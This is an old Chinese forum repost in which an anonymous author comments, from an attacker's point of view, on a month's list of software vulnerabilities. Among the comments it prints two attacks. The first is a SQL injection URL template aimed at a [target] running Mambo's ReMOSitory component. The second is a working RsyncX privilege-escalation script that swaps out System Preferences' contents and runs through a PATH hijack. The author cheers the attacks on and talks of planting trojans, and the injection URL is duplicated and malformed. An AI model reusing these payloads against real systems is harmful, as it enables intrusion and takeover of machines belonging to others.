9月安全漏洞

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

◆ Apache Web Server远程IPv6缓冲区溢出漏洞

截止,我发表这个章子之前,凹是没拿到利用程序,找了几个要IPV6模拟数据包构造的程序,没人搞这块,这几天收集一下,兰州大学o3那一组01年开始搞IPV6,并且有个实验网,问问他内部消息,GO ,GO ,GO

◆ Apache Mod_DAV LOCK远程拒绝服务漏洞

点进去就知道,咋利用了,也GO,GO,GO

◆ ReMOSitory Server远程SQL注入漏洞

/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/]http://[target]/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/* 国内用的还是少,不过有Mambo Open Source的,用以上URL构造,就可以达成注入攻击

◆ Google工具栏'About'跨站脚本执行漏洞

跨站,是实在搞不定,再搞,有写WEB利用脚本那会工夫,木马都杀进去几个了,看看也好,举一反三

◆ RsyncX本地权限提升漏洞

建立如下内容的~/bin/defaults文件:

=============================

#!/bin/sh

mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"

cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"

=============================

然后在用户路径的~/bin中运行RsyncX :

PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX

◆ FreeBSD本地内核缓冲区溢出漏洞

这东西有用,搜索了http://www.securityfocus.com/ 没找到攻击程序

◆ Microsoft Windows GDI+ JPG解析组件缓冲区溢出漏洞

yahoo.com,N写日子前就是被这块漏洞所破坏,构造木马程序写入JPG文件,怪他自己吧,发布了这么长时间,

YAHOO的安全顾问也没补,http://www.cert.org.cn/articles/vulnerability/common/2004091521909.shtml

这是国家安全应急中心发布的漏洞,描述和资料

◆ Apache mod_ssl反向代理SSL远程缓冲区溢出漏洞

最近的apache漏洞都很多,很多EXP都没有响应的效果,不能得到ROOT

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航